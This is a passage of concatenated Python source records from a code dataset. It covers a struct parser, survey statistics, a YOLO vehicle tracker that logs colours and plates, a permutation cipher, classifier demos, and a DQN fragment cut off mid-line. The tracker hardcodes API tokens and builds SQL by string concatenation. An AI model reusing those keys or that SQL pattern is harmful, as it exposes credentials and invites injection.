self.field_type(self.field_default)\n if self.field_description:\n instance.set_description(self.field_description)\n return instance\n\n def __str__(self):\n l = [repr(self.field_name)]\n l.append('field_type={0!r}'.format(self.field_type.__name__))\n for attr_name in ('field_default', ):\n attr = getattr(self, attr_name)\n if attr is not None:\n l.append('{0}={1!r}'.format(attr_name, attr))\n return \"{0}({1})\".format(self.__class__.__name__, ', '.join(l))\n\nclass MetaStruct(abc.ABCMeta):\n def __new__(cls, class_name, class_bases, class_dict):\n t = super(MetaStruct, cls).__new__(cls, class_name, class_bases, class_dict)\n for field in t.__fields__:\n setattr(t, field.field_name, field.field_type.create_property(field.field_name, field.attr_name))\n return t\n\nclass Struct(Field):\n __metaclass__ = MetaStruct\n __fields__ = ()\n def __init__(self):\n super(Struct, self).__init__()\n for field_type in self.__fields__:\n try:\n field = field_type.create()\n except Exception as e:\n raise ValueError(\"Struct {sc}: file {f}, line={ln}: invalid field type {ft}: {ec}: {e}\".format(\\\n sc=self.__class__.__name__,\n ft=field_type,\n f=field_type.filename,\n ln=field_type.line_number,\n ec=e.__class__.__name__,\n e=e))\n setattr(self, field_type.attr_name, field)\n for field_type in self.__fields__:\n field = getattr(self, field_type.attr_name)\n field.set_parent(self, field_type.field_name)\n\n def set_parent(self, parent, name):\n super(Struct, self).set_parent(parent, name)\n\n def get_item_name_prefix(self, parent):\n return parent.get_name()\n\n def get_name_separator(self):\n return \".\"\n\n def set(self, value):\n if isinstance(value, self.__class__):\n for field in self.__fields__:\n setattr(self, field.attr_name, getattr(value, field.attr_name))\n else:\n super(Struct, self).set(value)\n\n @classmethod\n def check(cls, value):\n return isinstance(value, cls)\n\n def __str__(self):\n return \"{0}({1})\".format(self.__class__.__name__, ', '.join(\"{0}={1!r}\".format(field.field_name, getattr(self, field.field_name)) for field in self.__fields__))\n __repr__ = __str__\n\n def accept(self, visitor):\n super(Struct, self).accept(visitor)\n for field in self.__fields__:\n getattr(self, field.attr_name).accept(visitor)\n\n def tostream(self, stream):\n for field in self.__fields__:\n getattr(self, field.attr_name).tostream(stream)\n\n def frominput(self, istream, caller_trace=None, name=None):\n caller_trace = CallerTrace(caller_trace, CallerInfo(self, name))\n for field in self.__fields__:\n getattr(self, field.attr_name).frominput(istream, caller_trace, field.field_name)\n\n def __eq__(self, other):\n self.check_comparable(other)\n for field in self.__fields__:\n attr_name = field.attr_name\n if getattr(self, attr_name) != getattr(other, attr_name):\n return False\n else:\n return True\n\n def dumptable(self, table, indentation_level=0, depth=-1):\n super(Struct, self).dumptable(table, indentation_level, depth)\n for field in self.__fields__:\n field_name = field.field_name\n attr_name = field.attr_name\n getattr(self, attr_name).dumptable(table, indentation_level + 1, depth)\n\n @classmethod\n def dumpclasstable(cls, table, name=None, indentation_level=0, description=\"\", depth=-1):\n super(Struct, cls).dumpclasstable(table, name, indentation_level, description, depth)\n for field in cls.__fields__:\n field_type = field.field_type\n field_name = field.field_name\n field_description = field.field_description\n field_type.dumpclasstable(table, cls._dumpcomposename(name, field_name), 
indentation_level + 1, field_description, depth)\n","sub_path":"structparser/struct.py","file_name":"struct.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"76898468","text":"# To do survey analysis in Python we need to use a non-standard branch\n# from github.\nimport sys\nsys.path.insert(0, \"/afs/umich.edu/user/k/s/kshedden/jarvis/statsmodels\")\n\nimport pandas as pd\nimport numpy as np\nimport statsmodels.api as sm\nimport patsy\nfrom read_meps import meps\n\nages = pd.cut(meps.AGE14X, np.arange(0, 90, 5))\n\n# Total office-visit expenses in billions, by age/sex category\ndi = sm.survey.SurveyDesign(strata=meps.VARSTR, cluster=meps.VARPSU,\n weights=meps.PERWT14F, nest=True)\nsj, se = [], []\nfor sex in 1,2:\n for age in ages.cat.categories:\n x = ((meps.SEX == sex) & (ages == age)) * meps.OBDEXP14\n svm = sm.survey.SurveyTotal(di, x)\n sj.append([sex, age, svm.est[0]])\n se.append([sex, age, svm.stderr[0]])\nsj = pd.DataFrame(sj)\nsj.columns = [\"Sex\", \"Age\", \"Prop\"]\nsj = sj.pivot(index=\"Age\", columns=\"Sex\", values=\"Prop\")\nsj /= 1e9\nse = pd.DataFrame(se)\nse.columns = [\"Sex\", \"Age\", \"SE\"]\nse = se.pivot(index=\"Age\", columns=\"Sex\", values=\"SE\")\nse /= 1e9\nprint(sj.to_string(float_format=\"%.2f\"))\nprint(se.to_string(float_format=\"%.2f\"))\n\n# Total office-visit expenses in billions, by age/sex category, using\n# fake clusters to illustrate the impact of clustering on the standard\n# errors.\ndi = sm.survey.SurveyDesign(strata=meps.VARSTR, cluster=np.random.choice(100, meps.shape[0]),\n weights=meps.PERWT14F, nest=True)\nsj2, se2 = [], []\nfor sex in 1,2:\n for age in ages.cat.categories:\n x = ((meps.SEX == sex) & (ages == age)) * meps.OBDEXP14\n svm = sm.survey.SurveyTotal(di, x)\n sj2.append([sex, age, svm.est[0]])\n se2.append([sex, age, svm.stderr[0]])\nsj2 = pd.DataFrame(sj2)\nsj2.columns = [\"Sex\", \"Age\", \"Prop\"]\nsj2 = sj2.pivot(index=\"Age\", columns=\"Sex\", values=\"Prop\")\nsj2 /= 1e9\nse2 = pd.DataFrame(se2)\nse2.columns = [\"Sex\", \"Age\", \"SE\"]\nse2 = se2.pivot(index=\"Age\", columns=\"Sex\", values=\"SE\")\nse2 /= 1e9\nprint(sj2.to_string(float_format=\"%.2f\"))\nprint(se2.to_string(float_format=\"%.2f\"))\n\n\nmeps[\"agecats\"] = ages\nmx = meps[[\"INSCOV14\", \"SEX\", \"agecats\", \"PERWT14F\", \"VARPSU\", \"VARSTR\"]].dropna()\ndi = sm.survey.SurveyDesign(strata=mx.VARSTR, cluster=mx.VARPSU,\n weights=mx.PERWT14F, nest=True)\ny,x = patsy.dmatrices(\"INSCOV14 ~ SEX + agecats\", data=mx)\ny = 1*(y == 3)\nmodel = sm.survey.SurveyModel(di, sm.GLM, init_args={\"family\": sm.families.Binomial()})\nresult = model.fit(y, x, cov_method=\"jackknife\")\nrslt = pd.DataFrame({\"Names\": x.design_info.column_names, \"Params\": model.params,\n \"SE\": model.stderr})\n","sub_path":"MEPS/meps_survey.py","file_name":"meps_survey.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"207439692","text":"import sys\nimport cv2\nimport numpy as np\nfrom tracking import *\nfrom yolo import YOLO\nimport copy\nimport random\nimport sqlite3\nimport requests\nfrom datetime import datetime\n\nvideoFileName = \"detect\"\nVIDEO_DIR = \"./videos/\" + videoFileName + \".mp4\"\n\ntemp_min = 0\ntemp_max = 0\nweather_main = 0\nlat = 0.0\nlng = 0.0\nvideo_len = 0\n\n\ndef letterbox_image(image, size):\n \"\"\"resize image with unchanged aspect ratio using padding\"\"\"\n 
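# letterboxing keeps the aspect ratio: scale by min(w/iw, h/ih), resize, then\n # centre the result on a gray (128,128,128) canvas of the target size -- e.g.\n # a 1280x720 frame fed a (608, 608) target scales by 0.475 to 608x342 and\n # leaves 133 gray rows above and below\n 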
ih, iw = image.shape[:2]\n h, w = size\n scale = min(w / iw, h / ih)\n nw = int(iw * scale)\n nh = int(ih * scale)\n\n # print(\"************************* scale *******************\")\n # print(ih,iw,nh,nw,scale)\n\n image = cv2.resize(image, (nw, nh), interpolation=cv2.INTER_CUBIC)\n new_image = np.zeros((h, w, 3), np.uint8)\n new_image[:, :] = (128, 128, 128)\n new_image[\n (h - nh) // 2 : (h - nh) // 2 + nh, (w - nw) // 2 : (w - nw) // 2 + nw\n ] = image\n return new_image, scale\n\n\nselection_dict = {\"img\": None, \"points selected\": []}\n\n\ndef select_point(event, x, y, flags, param):\n if event == cv2.EVENT_LBUTTONDOWN:\n cv2.circle(selection_dict[\"img\"], (x, y), 5, (0, 255, 0), -1)\n selection_dict[\"points selected\"].append([x, y])\n\n\ndef select_quadrilateral_from(image):\n selection_dict[\"img\"] = image\n cv2.namedWindow(\"selection frame\")\n cv2.setMouseCallback(\"selection frame\", select_point)\n\n while 1:\n cv2.imshow(\"selection frame\", image)\n if cv2.waitKey(20) & 0xFF == 27:\n break\n if len(selection_dict[\"points selected\"]) >= 4:\n break\n\n cv2.destroyAllWindows()\n if len(selection_dict[\"points selected\"]) != 4:\n return -1\n\n selection_dict[\"points selected\"].sort(key=lambda point: point[1])\n\n \"\"\"\n After sorting with y coordinate as key, the first two points represent the top two\n points of the quadrilateral, and the next two represent the bottom two.\n \"\"\"\n\n if (\n selection_dict[\"points selected\"][0][0]\n > selection_dict[\"points selected\"][1][0]\n ):\n selection_dict[\"points selected\"][0], selection_dict[\"points selected\"][1] = (\n selection_dict[\"points selected\"][1],\n selection_dict[\"points selected\"][0],\n )\n\n if (\n selection_dict[\"points selected\"][3][0]\n > selection_dict[\"points selected\"][2][0]\n ):\n selection_dict[\"points selected\"][3], selection_dict[\"points selected\"][2] = (\n selection_dict[\"points selected\"][2],\n selection_dict[\"points selected\"][3],\n )\n\n selection_dict[\"points selected\"] = np.array(\n selection_dict[\"points selected\"], dtype=np.int32\n )\n return 1\n\n\ndef getVehicleColor(img):\n # get image height and width\n h, w = img.shape[:2]\n pix = img[int(h / 2), int(w / 2)]\n\n # Create and initialize a dictionary of colors to 0\n colorTags = {\n \"whitish\": 0,\n \"grayish\": 0,\n \"black\": 0,\n \"blueish\": 0,\n \"greenish\": 0,\n \"reddish\": 0,\n \"yellowish\": 0,\n \"cyanish\": 0,\n \"purplish\": 0,\n \"other\": 0,\n }\n\n # Initialise pointer starting at 20% height and width\n # Because the main object is located at the center\n baseH = int(h * 0.2)\n baseW = int(w * 0.2)\n\n # Iterate through 40% of pixels around centroid\n for i in range(int(h * 0.4)):\n for j in range(int(w * 0.4)):\n # Increment the count of pixel color\n colorTags[getColor(img[baseH + i, baseW + j])] = (\n colorTags[getColor(img[baseH + i, baseW + j])] + 1\n )\n\n # Sort the dictionary in descending order of the number of times the color was detected\n sortedList = sorted(colorTags.items(), key=lambda kv: (kv[1], kv[0]), reverse=True)\n\n # Append the top 2 probable colors from the dictionary into colorList\n colorList = []\n for i in range(10):\n if len(colorList) >= 2:\n break\n if sortedList[i][0] != \"other\":\n colorList.append(sortedList[i][0])\n\n # Return the predicted colors\n return colorList\n\n\ndef getColor(c):\n # Typecast each color(b,g,r) to int\n c = [int(c[0]), int(c[1]), int(c[2])]\n if (\n abs(c[0] - c[1]) < 25\n and abs(c[1] - c[2]) < 25\n and abs(c[0] - c[2]) < 25\n and (sum(c) / 3) > 
200\n ):\n return \"whitish\"\n elif (\n abs(c[0] - c[1]) < 25\n and abs(c[1] - c[2]) < 25\n and abs(c[0] - c[2]) < 25\n and (sum(c) / 3) > 100\n ):\n return \"grayish\"\n elif (\n abs(c[0] - c[1]) < 5\n and abs(c[1] - c[2]) < 5\n and abs(c[0] - c[2]) < 5\n and (sum(c) / 3) < 100\n ):\n return \"black\"\n\n elif c[0] - c[1] > 25 and c[0] - c[2] > 25:\n return \"blueish\"\n elif c[1] - c[0] > 25 and c[1] - c[2] > 25:\n return \"greenish\"\n elif c[2] - c[1] > 25 and c[2] - c[0] > 25:\n return \"reddish\"\n\n # b g g r b r\n elif abs(c[0] - c[1]) > 25 and abs(c[1] - c[2]) < 25 and abs(c[0] - c[2]) > 25:\n return \"yellowish\"\n elif abs(c[0] - c[1]) < 25 and abs(c[1] - c[2]) > 25 and abs(c[0] - c[2]) > 25:\n return \"cyanish\"\n elif abs(c[0] - c[1]) > 25 and abs(c[1] - c[2]) > 25 and abs(c[0] - c[2]) < 25:\n return \"purplish\"\n\n return \"other\"\n\n\nif __name__ == \"__main__\":\n model_image_size = (608, 608)\n yolo = YOLO()\n\n conn = sqlite3.connect(\"traffic.db\")\n\n print(sys.argv)\n URL = \"http://api.openweathermap.org/data/2.5/weather?APPID=0bced365c4985a0af032b2cc537605cf\"\n PARAMS = {\"lat\": sys.argv[1], \"lon\": sys.argv[2]}\n r = requests.get(url=URL, params=PARAMS)\n weather_data = r.json()\n\n temp_max = weather_data[\"main\"][\"temp_max\"]\n temp_min = weather_data[\"main\"][\"temp_min\"]\n lat = float(sys.argv[1])\n lng = float(sys.argv[2])\n video_len = int(sys.argv[3])\n timestamp = sys.argv[4]\n datestamp = sys.argv[5]\n\n print(\"\\n\\n\\n\")\n dist_box = float(input(\"Distance of bounding box\"))\n print(\"\\n\\n\\n\")\n\n if weather_data[\"weather\"][0][\"main\"] == \"Haze\":\n weather_main = 0\n elif weather_data[\"weather\"][0][\"main\"] == \"Clouds\":\n weather_main = 1\n elif weather_data[\"weather\"][0][\"main\"] == \"Clear\":\n weather_main = 2\n elif weather_data[\"weather\"][0][\"main\"] == \"Rain\":\n weather_main = 3\n elif weather_data[\"weather\"][0][\"main\"] == \"Extreme\":\n weather_main = 4\n\n vehicle_count = 0\n frameNum = 0\n vehicle_saved = []\n vehicles = []\n cap = cv2.VideoCapture(VIDEO_DIR)\n ret, image = cap.read()\n image, scale = letterbox_image(image, tuple(reversed(model_image_size)))\n\n if select_quadrilateral_from(image) == -1:\n print(\"You must select 4 points\")\n cap.release()\n yolo.session_close()\n exit(0)\n\n quad_as_contour = selection_dict[\"points selected\"].reshape((-1, 1, 2))\n\n while True:\n frameNum += 1\n timePassed = frameNum / 30.0\n start = time.time()\n ret, image = cap.read()\n if image is None:\n break\n original_image = copy.copy(image)\n image, scale = letterbox_image(image, tuple(reversed(model_image_size)))\n boxes, objs = yolo.detect_image(image)\n # print(objs[\"label\"])\n \"\"\"\n Here we need to track\n \"\"\"\n selected_boxes = []\n for box in boxes:\n y_mid = (box[0] + box[1]) // 2\n x_mid = (box[2] + box[3]) // 2\n if (\n cv2.pointPolygonTest(\n selection_dict[\"points selected\"], (x_mid, y_mid), measureDist=False\n )\n >= 0\n ):\n selected_boxes.append(box)\n\n new_vehicles = not_tracked(\n selected_boxes, vehicles, vehicle_count, videoFileName, frameNum\n )\n vehicle_velocity_sum, deleted_count = update_or_deregister(\n selected_boxes, vehicles, dist_box, conn, frameNum\n )\n\n vehicle_count += len(new_vehicles)\n vehicles += new_vehicles\n\n for vehicle in vehicles:\n curH, curW = original_image.shape[:2]\n\n if (\n int(vehicle.top // scale) - 20 > 0\n and int(vehicle.bottom // scale) + 20 < curH\n and int(vehicle.top // scale) - 20 > 0\n and int(vehicle.right // scale) + 20 < curW\n ):\n 
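# crop the detection with a 20 px margin on every side; this branch runs only\n # when the padded box still fits inside the frame (the else below crops tight)\n 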
crop_img = original_image[\n int(vehicle.top // scale) - 20 : int(vehicle.bottom // scale) + 20,\n int(vehicle.left // scale) - 20 : int(vehicle.right // scale) + 20,\n ]\n else:\n crop_img = original_image[\n int(vehicle.top // scale) : int(vehicle.bottom // scale),\n int(vehicle.left // scale) : int(vehicle.right // scale),\n ]\n\n try:\n cv2.imshow(\"cropped\", crop_img)\n except:\n pass\n filename = \"static/\" + videoFileName + \"-\" + str(vehicle.id) + \".jpg\"\n\n try:\n colorLst = getVehicleColor(crop_img)\n except:\n pass\n\n try:\n # add to img data set\n conn.execute(\n \"\"\"CREATE TABLE vehiclesLog\n (ID varchar PRIMARY KEY,\n lat REAL NOT NULL,\n lng REAL NOT NULL,\n speed real,\n object varchar,\n url varchar,\n color1 varchar,\n color2 varchar,\n number_plate varchar,\n timestamp time,\n datestamp date);\"\"\"\n )\n except:\n a = 1\n\n try:\n conn.execute(\n \"INSERT INTO vehiclesLog (ID, lat, lng, object, url, color1, color2, number_plate, timestamp, datestamp) VALUES ( '\"\n + str(videoFileName)\n + \"-\"\n + str(vehicle.id)\n + \"', \"\n + str(lat)\n + \", \"\n + str(lng)\n + \", '\"\n + str(vehicle.label)\n + \"', '\"\n + str(filename)\n + \"', '\"\n + str(colorLst[0])\n + \"', '\"\n + str(colorLst[1])\n + \"', '\"\n + str(\"number\")\n + \"', '\"\n + str(timestamp)\n + \"', '\"\n + str(datestamp)\n + \"');\"\n )\n conn.commit()\n except:\n a = 1\n\n try:\n img = cv2.imread(filename)\n # if 1 - abs(img.shape[1] / img.shape[0]) > 1 - abs(crop_img.shape[1] / crop_img.shape[0]):\n if (\n img.shape[1] < crop_img.shape[1]\n and img.shape[0] < crop_img.shape[0]\n ):\n cv2.imwrite(filename, crop_img)\n except:\n cv2.imwrite(filename, crop_img)\n\n # cv2.rectangle(original_image, (int(vehicle.left//scale), int(vehicle.top//scale)), (int(vehicle.right//scale), int(vehicle.bottom//scale)), (255, 0, 0), 2)\n # cv2.putText(original_image, str(vehicle.label), ((int(vehicle.left//scale)) -1 , (int(vehicle.top//scale)) - 5),\n # cv2.FONT_HERSHEY_SIMPLEX , fontScale=0.75, color=(255, 255, 0),\n # thickness=2)\n # cv2.putText(original_image, str(vehicle.id), ((int(vehicle.left//scale)+int(vehicle.right//scale))//2 -1 , (int(vehicle.top//scale)+int(vehicle.bottom//scale))//2 + 1),\n # cv2.FONT_HERSHEY_DUPLEX, fontScale=0.5, color=(255, 255, 0),\n # thickness=1)\n cv2.rectangle(\n image,\n (vehicle.left, vehicle.top),\n (vehicle.right, vehicle.bottom),\n (255, 0, 0),\n 2,\n )\n # cv2.putText(\n # image,\n # str(vehicle.label),\n # ((vehicle.left) - 1, (vehicle.top) - 5),\n # cv2.FONT_HERSHEY_DUPLEX,\n # fontScale=0.5,\n # color=(255, 255, 0),\n # thickness=1,\n # )\n cv2.putText(\n image,\n str(vehicle.id),\n (\n (vehicle.left + vehicle.right) // 2 - 1,\n (vehicle.top + vehicle.bottom) // 2 + 1,\n ),\n cv2.FONT_HERSHEY_DUPLEX,\n fontScale=0.5,\n color=(255, 255, 0),\n thickness=1,\n )\n end = time.time()\n cv2.putText(\n image,\n \"FPS: \" + str(int(1 / (end - start))),\n (0, 20),\n cv2.FONT_HERSHEY_COMPLEX,\n 0.5,\n (255, 255, 255),\n 1,\n )\n cv2.putText(\n image,\n \"Count: \" + str(vehicle_count),\n (608 // 2 - 20, 20),\n cv2.FONT_HERSHEY_COMPLEX,\n 0.5,\n (255, 255, 255),\n 1,\n )\n cv2.polylines(image, [quad_as_contour], True, (0, 255, 0), thickness=2)\n cv2.imshow(\"frame\", image)\n\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n break\n\n cap.release()\n yolo.session_close()\n\n traffic_rate = vehicle_count / video_len\n ambulance_rate = 0\n hour = int(datetime.now().strftime(\"%H\"))\n month = int(datetime.now().strftime(\"%m\"))\n\n # done processing\n try:\n conn.execute(\n 
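# summary table: one row per processed video with the traffic/ambulance rates,\n # the encoded weather condition, hour/month and the day's temperature band\n 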
\"\"\"CREATE TABLE data_new\n (ID integer PRIMARY KEY AUTOINCREMENT,\n lat REAL NOT NULL,\n lng REAL NOT NULL,\n traffic_rate REAL NOT NULL,\n ambulance_rate REAL NOT NULL,\n weather integer,\n hour integer,\n month integer,\n temp_min REAL,\n temp_max REAL);\"\"\"\n )\n except:\n a = 1\n\n conn.execute(\n \"INSERT INTO data_new (lat,lng,traffic_rate,ambulance_rate,weather,temp_min,temp_max,hour,month) \\\n VALUES ( \"\n + str(lat)\n + \", \"\n + str(lng)\n + \", \"\n + str(traffic_rate)\n + \", \"\n + str(ambulance_rate)\n + \", \"\n + str(weather_main)\n + \", \"\n + str(temp_min)\n + \", \"\n + str(temp_max)\n + \", \"\n + str(hour)\n + \", \"\n + str(month)\n + \" )\"\n )\n conn.commit()\n print(\"Records added successfully to database\")\n conn.close()\n\n # ********************************************************** detect number plate **********************************************************\n conn = sqlite3.connect(\"traffic.db\")\n cursor = conn.execute(\"SELECT ID, url from vehiclesLog WHERE number_plate='number'\")\n for row in cursor:\n id = str(row[0])\n filename = \"./\" + str(row[1])\n print(id)\n\n with open(filename, \"rb\") as fp:\n response = requests.post(\n \"https://api.platerecognizer.com/v1/plate-reader/\",\n files=dict(upload=fp),\n headers={\n \"Authorization\": \"Token b74bffe69366f851e3a88dbb28d285900cfeeb57\"\n },\n )\n print(response.json())\n try:\n print(\"#\")\n numPlate = response.json()[\"results\"][0][\"plate\"]\n print(\"Plate number: \")\n print(str(numPlate).upper())\n print(\"\\n\")\n conn.execute(\n \"UPDATE vehiclesLog set number_plate = '\"\n + str(numPlate)\n + \"' WHERE ID = '\"\n + id\n + \"'\"\n )\n conn.commit()\n except:\n print(\"err\")\n pass\n print(\"Operation done successfully\")\n conn.close()\n","sub_path":"yolo_video.py","file_name":"yolo_video.py","file_ext":"py","file_size_in_byte":16192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"519740388","text":"import sys\n\nclass PermCypher:\n def __init__(self):\n self.mode = sys.argv[1]\n self.key = sys.argv[2]\n self.key = [int(i) for i in self.key]\n self.inputFileName = sys.argv[3]\n self.outputFileName = sys.argv[4]\n\n def importData(self):\n with open(self.inputFileName) as file:\n data = file.read()\n return data\n\n def exportData(self, data):\n with open(self.outputFileName, 'w') as file:\n file.write(data)\n \n def encrypt(self, data):\n data = \"\".join(data.split(\" \"))\n out = \"\"\n for _ in range(0, len(data)%len(self.key)*-1%len(self.key)):\n data += \"X\"\n for offset in range(0, len(data), len(self.key)):\n for e in [a-1 for a in self.key]:\n out += data[offset+e]\n out += \" \"\n return out[:-1].replace(\" \",\"\")\n\n def inverse_key(self):\n inverse = []\n for position in range(min(self.key),max(self.key)+1,1):\n inverse.append(self.key.index(position)+1)\n print('inversed_key: '+str(inverse))\n return inverse\n\n def decrypt(self, data):\n self.key = self.inverse_key()\n return self.encrypt(data).replace(\" \",\"\")\n \n def translate(self):\n data = self.importData()\n if self.mode == '-d':\n self.exportData(self.decrypt(data))\n elif self.mode == '-e':\n self.exportData(self.encrypt(data))\n\n\n\ndef main():\n pc = PermCypher()\n pc.translate()\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"data_protection/historical_cyphers/permutation_cypher.py","file_name":"permutation_cypher.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"424098142","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 31 22:59:21 2019\n\n@author: suraj\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy.random import seed\nseed(123)\nfrom sklearn.neighbors import KDTree\nfrom sklearn.datasets import make_spd_matrix\n\nplt.rcParams.update({'font.size': 12})\n\n#%%\ndef mask_results(xtrain, ytrain, xtest, ytest, ypred):\n train_c0 = xtrain[ytrain[:,0]==0]\n train_c1 = xtrain[ytrain[:,0]==1]\n test_c0 = xtest[(ytest[:,0]==0) & (ypred[:,0]==0)]\n test_c1 = xtest[(ytest[:,0]==1) & (ypred[:,0]==1)]\n test_ic0 = xtest[(ytest[:,0]==0) & (ypred[:,0]==1)]\n test_ic1 = xtest[(ytest[:,0]==1) & (ypred[:,0]==0)]\n \n return train_c0, train_c1, test_c0, test_c1, test_ic0, test_ic1 \n\n#%%\ndef plot_results(train_c0, train_c1, test_c0, test_c1, test_ic0, test_ic1,name):\n fig, ax = plt.subplots(figsize=(10,8))\n \n ax.scatter(train_c0[:,0],train_c0[:,1],marker='x',color='r',label='Training: class 0')\n ax.scatter(train_c1[:,0],train_c1[:,1],marker='x',color='b',label='Training: class 1')\n \n ax.scatter(test_c0[:,0],test_c0[:,1],marker='x',color='g',label='Correctly classified class 0')\n plt.scatter(test_c1[:,0],test_c1[:,1],marker='x',color='m',label='Correctly classified class 1')\n \n ax.scatter(test_ic0[:,0],test_ic0[:,1],marker='D',color='k',label='Incorrectly classified class 0')\n ax.scatter(test_ic1[:,0],test_ic1[:,1],marker='D',color='darkorange',label='Incorrectly classified class 1')\n \n ax.set_xlabel(r'$x_1$',fontsize=18)\n ax.set_ylabel(r'$x_2$',fontsize=18)\n ax.legend()\n plt.show()\n fig.savefig(name)\n \n#%%\nn1 = 5000\nn2 = 5000\nsplit = 0.5\n\nmean1 = np.random.randn(1,2).flatten()\ncov1 = make_spd_matrix(2,2)\ndata1 = np.random.multivariate_normal(mean1, cov1, n1)\nlabel1 = np.zeros((n1,1))\n\nmean2 = np.random.randn(1,2).flatten()\ncov2 = make_spd_matrix(2,2)\ndata2 = np.random.multivariate_normal(mean2, cov2, n2)\nlabel2 = np.ones((n2,1))\n\ndata = np.vstack((data1,data2))\nlabels = np.vstack((label1,label2))\n\n#%%\nindices = np.full(data.shape[0],True)\nindices[:int(data.shape[0]*split)] = False\nnp.random.shuffle(indices)\n\nxtrain, ytrain = data[indices==True], labels[indices==True]\nxtest, ytest = data[indices==False], labels[indices==False]\n\n#%%\ndef linear_classifier(xtrain, ytrain):\n xtxi = np.linalg.inv(np.dot(xtrain.T, xtrain))\n beta = np.dot(np.dot(xtxi,xtrain.T),ytrain)\n \n return beta\n\nbeta = linear_classifier(xtrain, ytrain)\n\nypred = np.zeros((ytest.shape))\nypred = np.dot(xtest,beta)\n\n#%%\nypred = np.array(ypred > 0.5, dtype=int)\n\ntrain_c0, train_c1, test_c0, test_c1, test_ic0, test_ic1 = mask_results(xtrain, ytrain, xtest, ytest, ypred)\n\nlin_accuracy = (test_c0.shape[0] + test_c1.shape[0])/(ytest.shape[0])\n\nplot_results(train_c0, train_c1, test_c0, test_c1, test_ic0, test_ic1,'linear_classifier.pdf')\n\n#%%\ntree = KDTree(xtrain, leaf_size=2)\n\nnearest_dist, nearest_ind = tree.query(xtest, k=1)\nypred_kdtree = ytest[nearest_ind[:,0]]\n\ntrain_c0_kdt, train_c1_kdt, test_c0_kdt, test_c1_kdt, test_ic0_kdt, test_ic1_kdt = mask_results(xtrain, \n ytrain, \n xtest, \n ytest, \n ypred_kdtree)\n\nkdtree_accuracy = (test_c0_kdt.shape[0] + test_c1_kdt.shape[0])/(ytest.shape[0])\n\nplot_results(train_c0_kdt, train_c1_kdt, 
test_c0_kdt, test_c1_kdt, test_ic0_kdt, test_ic1_kdt,'kdtree_classifier.pdf')\n\n#%%\nprint('Linear classifier accuracy = ', round(lin_accuracy*100,2), '%')\nprint('kD tree classifier accuracy = ', round(kdtree_accuracy*100,2), '%')","sub_path":"CS5783_ML/Assignment 1/problem_2_3_4.py","file_name":"problem_2_3_4.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"168169848","text":"\"\"\"Program that outputs one of at least four random, good fortunes.\"\"\"\n\n__author__ = \"730475029\" \nfrom random import randint\nprint(\"Your fortune cookie says...\")\nx: int = (randint(1, 4))\nif x == 1:\n print(\"You will be very successful.\")\nelif x == 2:\n print(\"Your business endeavors will prosper.\")\nelif x == 3:\n print(\"You will live a happy life.\")\nelif x == 4:\n print(\"You will make a lot of money.\")\nprint(\"Now, go spread positive vibes!\")","sub_path":"exercises/ex02/fortune_cookie.py","file_name":"fortune_cookie.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"418819298","text":"import gym\nimport tensorflow as tf\nimport numpy as np\nimport random\nfrom collections import deque\n\nENV_NAME = 'CartPole-v0'\nEPISODE = 10000\nSTEP = 300\n\n# Hyper Parameters for DQN\nGAMMA = 0.9 # discount factor for target Q\nINITIAL_EPSILON = 0.5 # starting value of epsilon\nFINAL_EPSILON = 0.01 # final value of epsilon\nREPLAY_SIZE = 10000 # experience replay buffer size\nBATCH_SIZE = 32 # size of minibatch\n\n\nclass DQN(object):\n def __init__(self, env):\n self.replay_buffer = deque()\n\n self.time_step = 0\n self.epsilon = INITIAL_EPSILON\n self.state_dim = env.observation_space.shape[0]\n self.action_dim = env.action_space.n\n\n self._create_network()\n self._create_training_method()\n\n self.sess = tf.InteractiveSession()\n self.sess.run(tf.global_variables_initializer())\n\n def _create_network(self):\n w1 = tf.get_variable('w1', shape=[self.state_dim, 20]) # 20 hidden units in the MLP\n b1 = tf.get_variable('b1', [20])\n\n w2 = tf.get_variable('w2',[20, self.action_dim])\n b2 = tf.get_variable('b2',[self.action_dim])\n\n self.state_input = tf.placeholder(tf.float32, [None, self.state_dim])\n net = tf.nn.relu(tf.matmul(self.state_input, w1) + b1)\n self.q_value = tf.matmul(net, w2) + b2\n\n def _create_training_method(self):\n # the action arrives as a one-hot 0/1 vector, built in perceive() below\n self.action_input = tf.placeholder(tf.float32, [None, self.action_dim]) # one hot presentation\n self.y_input = tf.placeholder(tf.float32, [None]) # the Bellman
 targets, computed batch-wise in _train_net\n\n q_action = tf.reduce_sum(tf.multiply(self.q_value, self.action_input), axis=1)\n self.loss = tf.reduce_mean(tf.square(self.y_input - q_action))\n\n self.opt = tf.train.AdadeltaOptimizer(1e-5).minimize(self.loss)\n\n def perceive(self, state, action, reward, next_state, done):\n one_hot_action = np.zeros(self.action_dim)\n one_hot_action[action] = 1\n self.replay_buffer.append((state, one_hot_action, reward, next_state, done))\n if len(self.replay_buffer) > REPLAY_SIZE:\n self.replay_buffer.popleft()\n\n if len(self.replay_buffer) > BATCH_SIZE:\n self._train_net()\n\n def _train_net(self):\n self.time_step += 1\n # step 1: obtain random minibatch from replay memory\n minibatch = random.sample(self.replay_buffer, BATCH_SIZE)\n state_batch = [data[0] for data in minibatch]\n action_batch = [data[1] for data in minibatch]\n reward_batch = [data[2] for data in minibatch]\n next_state_batch = [data[3] for data in minibatch]\n done_batch = [data[4] for data in minibatch]\n\n # step 2: calculate y\n y_batch = []\n q_value_batch = self.q_value.eval(feed_dict={self.state_input: next_state_batch}) # next states: the target needs max_a' Q(s', a')\n for i in range(BATCH_SIZE):\n done = done_batch[i]\n if done:\n y_batch.append(reward_batch[i])\n else:\n y_batch.append(reward_batch[i] + 